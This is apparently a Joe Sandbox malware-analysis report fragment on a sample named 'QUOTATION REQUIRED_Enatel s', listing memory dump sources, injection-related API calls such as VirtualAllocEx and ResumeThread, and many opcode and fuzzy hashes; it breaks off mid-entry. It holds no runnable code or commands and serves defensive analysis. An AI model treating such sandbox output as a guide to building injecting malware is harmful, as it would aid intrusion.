                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              APIs
                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D0AF16
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ResumeThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0F855
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 024DB4C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1631854951.00000000024D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_24d0000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 06D0F855
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1636677987.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6d00000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: S_?
                                                                                                                                              • API String ID: 0-452863325
                                                                                                                                              • Opcode ID: f08f0dd6433e4ac6a5c298c3794126f30306294d79d1381f38fa72acfe41a932
                                                                                                                                              • Instruction ID: d86d37430e599741dee53fb0f42ffd11b446cc94376ba65947d307df3f1ed99c
                                                                                                                                              • Opcode Fuzzy Hash: f08f0dd6433e4ac6a5c298c3794126f30306294d79d1381f38fa72acfe41a932
                                                                                                                                              • Instruction Fuzzy Hash: 7A21FD327006418FD711DB28D4419AE7BF6EF85316B0489AED146DB7A1DF30EC0A8BA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c78f13d69a033cd994912989fa2d2f37d98eaa03df91fae493b4c21800d0d66c
                                                                                                                                              • Instruction ID: ae7229d396a91c8cb8c981e66ddac6a26a07160043ebd00c0c66550795da0cc9
                                                                                                                                              • Opcode Fuzzy Hash: c78f13d69a033cd994912989fa2d2f37d98eaa03df91fae493b4c21800d0d66c
                                                                                                                                              • Instruction Fuzzy Hash: 196230B4E00B81CADB30DF7494A83AD7BA1BB45301F50499FC2EACF294DB75A481DB25
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4bef3a5b8da2281509c42fbd2aab6f1a9676b50355aaa7e9497abaf0cac7dfae
                                                                                                                                              • Instruction ID: 8e7ccef9032419c2c1e353fd40765f2fdd80217ff3261e199dffdcb7df90f111
                                                                                                                                              • Opcode Fuzzy Hash: 4bef3a5b8da2281509c42fbd2aab6f1a9676b50355aaa7e9497abaf0cac7dfae
                                                                                                                                              • Instruction Fuzzy Hash: 59B13C35B002088BEB18EBB5D554AAE77E6FFC8705B2444ADD942AB390DF35EC41CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1887518b55ecd91f02a620a0ff7bd2c130daa4515f8e8513e91429e101c2f154
                                                                                                                                              • Instruction ID: 8b3cfc23172081c7b5c534175722cefe677a305e3da2b7db7a8f445f85b29d07
                                                                                                                                              • Opcode Fuzzy Hash: 1887518b55ecd91f02a620a0ff7bd2c130daa4515f8e8513e91429e101c2f154
                                                                                                                                              • Instruction Fuzzy Hash: 6891EF71E05308DFDB18DFA5E84469EBFB2FF85301F10846AE445A7391DB34A816CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5250f3dcb6c93f5ef8e7b453efba2d0e3dc1c9a9d2efb815a31990743147176d
                                                                                                                                              • Instruction ID: 8891b63a61c4684e04987d7d1927efea295e0ebb572666eb6a66d39be012ce25
                                                                                                                                              • Opcode Fuzzy Hash: 5250f3dcb6c93f5ef8e7b453efba2d0e3dc1c9a9d2efb815a31990743147176d
                                                                                                                                              • Instruction Fuzzy Hash: 94B16074B112049FDB18EB69D594BAEBBF6EF88700F244069E505AB3A5CB30ED49CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cbb41468b298d443f7feb1255e5987cb9673e150907e5a4adcd62f98b6615dbc
                                                                                                                                              • Instruction ID: d8ea1919f65e22ff6d2281fb72dced305a0d8636932bbf134328ef0920deb294
                                                                                                                                              • Opcode Fuzzy Hash: cbb41468b298d443f7feb1255e5987cb9673e150907e5a4adcd62f98b6615dbc
                                                                                                                                              • Instruction Fuzzy Hash: 4B9158707002048FDB18EB75C490B6E77A2FB85206F10896AE55A8B3A2DB74FC42CB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6b04e90f8f791d3ee934fa129e358f4a3ad4f2560cc2c6f8acbbaa0848958c55
                                                                                                                                              • Instruction ID: a44b2c8e1ac87395bbabb261c4524cfc16d2d47a25b7bbaea11e6b91bcd81263
                                                                                                                                              • Opcode Fuzzy Hash: 6b04e90f8f791d3ee934fa129e358f4a3ad4f2560cc2c6f8acbbaa0848958c55
                                                                                                                                              • Instruction Fuzzy Hash: DD91A275A00619CFDB04EF68C884AAEBBB5FF84701F1585A9E405EB361DB31EC41CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dba7cb45693b2bfb14507bedbe591545a79ef2d48b28812cbf7ad61013915c7e
                                                                                                                                              • Instruction ID: 6d05a7d9482f6841c6870af174b466e140b4700884c5517cf4e44009fc4e175c
                                                                                                                                              • Opcode Fuzzy Hash: dba7cb45693b2bfb14507bedbe591545a79ef2d48b28812cbf7ad61013915c7e
                                                                                                                                              • Instruction Fuzzy Hash: B851F131E0521ACFCB14EFB8C88467E7BB6AFC1236F1545A9D405D7361EB30E88287A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 590dd9c40cdd5ed41d3a58c4072a6834b2fc7680ade22d6cc3852d46ce343a2c
                                                                                                                                              • Instruction ID: e67074ba44265d8b276d9a7fd38887c22d7b944761d58b6c0c5680f8e187596b
                                                                                                                                              • Opcode Fuzzy Hash: 590dd9c40cdd5ed41d3a58c4072a6834b2fc7680ade22d6cc3852d46ce343a2c
                                                                                                                                              • Instruction Fuzzy Hash: 8F716C34B006098FDB14DFA9D8587ADBBF1FF88301F118569E856A7390EB34AD85CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b28f001ac566aad382a95f2c20a6c95aa62a190216f481cf18ad33a5045f6022
                                                                                                                                              • Instruction ID: eb3c7558e625e31abcbc3ed20046b85d63d9d169185cf55ecb360b061fc57b9f
                                                                                                                                              • Opcode Fuzzy Hash: b28f001ac566aad382a95f2c20a6c95aa62a190216f481cf18ad33a5045f6022
                                                                                                                                              • Instruction Fuzzy Hash: 84717C78A01608AFCB15DF69D884DAEBBB6FF49715B114099F901AB361DB31EC81CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4d4993df9557d7c046afb978ce5f083062061c80ed851499edc8e850a43bcd54
                                                                                                                                              • Instruction ID: 44f61a83828cc8743679c63c2829bbcd95520f2581bee38ff48d0d4bd96b9b0b
                                                                                                                                              • Opcode Fuzzy Hash: 4d4993df9557d7c046afb978ce5f083062061c80ed851499edc8e850a43bcd54
                                                                                                                                              • Instruction Fuzzy Hash: F751AF71A002059FEB11EFA5E4602AEB7F6FF88306F14456ED50AE7240EB31F905CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a1473ef65c08df897e620703202ed9612f4a9632488a9787c63ab594771f0d40
                                                                                                                                              • Instruction ID: f7ebde56b862e4a583db31f54b9f8dd6944bf4c1c19ea85ebbc67b4d5735a9e3
                                                                                                                                              • Opcode Fuzzy Hash: a1473ef65c08df897e620703202ed9612f4a9632488a9787c63ab594771f0d40
                                                                                                                                              • Instruction Fuzzy Hash: 0B51D135B102058FDB04EFB9D848A6EBBF6FFC4721B148969E415D7351EB30AD0587A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e624b098f733ca8f6f474494320cb0df3f81532cb12dd0235e55da7a22057f7f
                                                                                                                                              • Instruction ID: 53602df88cff371780155767cb1182c9a30b097866f88426d7d35c6d77e208b6
                                                                                                                                              • Opcode Fuzzy Hash: e624b098f733ca8f6f474494320cb0df3f81532cb12dd0235e55da7a22057f7f
                                                                                                                                              • Instruction Fuzzy Hash: 04519F75E002099FDF14EFAAD804AAFBBF9EF88301F10842AD455E3250DB74A901CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 268884d1b695cad12b2c2e26b9e588b7f817fece701580a35f10012e5cba2104
                                                                                                                                              • Instruction ID: 626f120c2875ae4058f0dbac875bdee19d993aa026888e2fb6a61259bc94cb41
                                                                                                                                              • Opcode Fuzzy Hash: 268884d1b695cad12b2c2e26b9e588b7f817fece701580a35f10012e5cba2104
                                                                                                                                              • Instruction Fuzzy Hash: A341A2355003518BDB00EF14D49039A7366EF81718F55847ACD0D7F346DBB2A949CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: dc9111ca120c86088765ddaec506a0f30cde8cd4f744ac093b63c3e017c1d05c
                                                                                                                                              • Instruction ID: f48bf35c427b77e5570c64c662840663d88438699a72f080206974acb952355e
                                                                                                                                              • Opcode Fuzzy Hash: dc9111ca120c86088765ddaec506a0f30cde8cd4f744ac093b63c3e017c1d05c
                                                                                                                                              • Instruction Fuzzy Hash: B2413C79B006098FDB14DF29C885E6EB7B6FF88711F1585A9E915AB3A1CB30EC01CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4414a26a2d31ab01141c419fcc6b71122261d24e161c11a199ae21661a908501
                                                                                                                                              • Instruction ID: 97c23955ebc1a3fab49c55fe5010c07e9cb133484a914dac9f82de563f6539f3
                                                                                                                                              • Opcode Fuzzy Hash: 4414a26a2d31ab01141c419fcc6b71122261d24e161c11a199ae21661a908501
                                                                                                                                              • Instruction Fuzzy Hash: 19316C75E00248DFDB05DFA5D8549DEBFB6EF8A301F1480AAE805AB360DB359D06CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 09e1ee940eebc08c5a9dc338a928a8263beaa5157f81f6cf0898324ae0e29e66
                                                                                                                                              • Instruction ID: eca5f105308c223735b7e38a86c5f378649bbb0f0260bca29cafb937053809f2
                                                                                                                                              • Opcode Fuzzy Hash: 09e1ee940eebc08c5a9dc338a928a8263beaa5157f81f6cf0898324ae0e29e66
                                                                                                                                              • Instruction Fuzzy Hash: 7B314370D15359CFCB0A9FA9C8487EDBBF8AF4A309F10506AD415B3281C7748A48CFA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 83171ca67601f8e859e5ab56afd76b3b754bb3fdb72a1b7ac5ed3fa86b885398
                                                                                                                                              • Instruction ID: c40b1d16b9620fe0f002ad37d996523a6ff9e95878c9e4438259a12173b9ce07
                                                                                                                                              • Opcode Fuzzy Hash: 83171ca67601f8e859e5ab56afd76b3b754bb3fdb72a1b7ac5ed3fa86b885398
                                                                                                                                              • Instruction Fuzzy Hash: 5441AFB1D10359DFDB14CF9AC884A9EFBB5BF88710F60812AE419BB250DB75A845CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 1ff02cfde3df385ace28acc5cb2b622e50657d08d78e100e5234f8c47aef6254
                                                                                                                                              • Instruction ID: 03bdf33eac6f5b76b4e9ac4397346d6421cd6e050ae1b589cc55a6e3c338918a
                                                                                                                                              • Opcode Fuzzy Hash: 1ff02cfde3df385ace28acc5cb2b622e50657d08d78e100e5234f8c47aef6254
                                                                                                                                              • Instruction Fuzzy Hash: BF418CB1D10359DFDB14CFAAD884A9EFBB1BF88710F60812AE419AB250DB756845CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1638199905.000000000C380000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C380000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c380000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 70c020860ec31d7949e3b2fdf3b6ac8e5873c3dcb23b4b6fe09ef8d1fa46c2f0
                                                                                                                                              • Instruction ID: 6b9c5bc5c3bbab4c4e42f9cd46e88826804a2f53b5945eb36b2606e3ba172f22
                                                                                                                                              • Opcode Fuzzy Hash: 70c020860ec31d7949e3b2fdf3b6ac8e5873c3dcb23b4b6fe09ef8d1fa46c2f0
                                                                                                                                              • Instruction Fuzzy Hash: 45310470D15219CBDB49EFE9D8487FEBBF8AB4A709F10506AD419B3241C7748A48CFA4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 175e68b2e45787022b7e48d9befa91159fdcb9687f5745d4fbd8eb13cf85a951
                                                                                                                                              • Instruction ID: 2baf9683502dfc990f09f31f20ed662ef61b2ee3041e4ebe0a51bc7ba30925df
                                                                                                                                              • Opcode Fuzzy Hash: 175e68b2e45787022b7e48d9befa91159fdcb9687f5745d4fbd8eb13cf85a951
                                                                                                                                              • Instruction Fuzzy Hash: 7031DF32A00258DFCF05EF64E855AED7FB1EF49326F1444AAE401BB2A1DB319D45CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 54c682c813a7f281a70cb7ac093c537e6da0d648b22e1918f24e2abaf0ba8f28
                                                                                                                                              • Instruction ID: ff414afa482c37cb3ff59ef022e8df3224f0ac97ab09f52ab3891f9bf75f45a6
                                                                                                                                              • Opcode Fuzzy Hash: 54c682c813a7f281a70cb7ac093c537e6da0d648b22e1918f24e2abaf0ba8f28
                                                                                                                                              • Instruction Fuzzy Hash: 4F311439A20218DFCB04DFA8D895EACB7B5FF89705B0181A9E845AB321DB30AD40CF50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d3fbabbb6fa599e9b04b097fb4aff008edc4ef45722c4b18ae89e3cefe1c7880
                                                                                                                                              • Instruction ID: e774f03a2c4029ba453f7dd3ccf14ecf699d24666ed203a7f95f48bc80f09824
                                                                                                                                              • Opcode Fuzzy Hash: d3fbabbb6fa599e9b04b097fb4aff008edc4ef45722c4b18ae89e3cefe1c7880
                                                                                                                                              • Instruction Fuzzy Hash: FA31F675D00218EFCB04DFA9D848AEEFBB5FF89301F158069E519AB261C7799940DFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9cb69d87189672444dbe66807843f0723efd9bb109e3c42c6e78e4b31d76df30
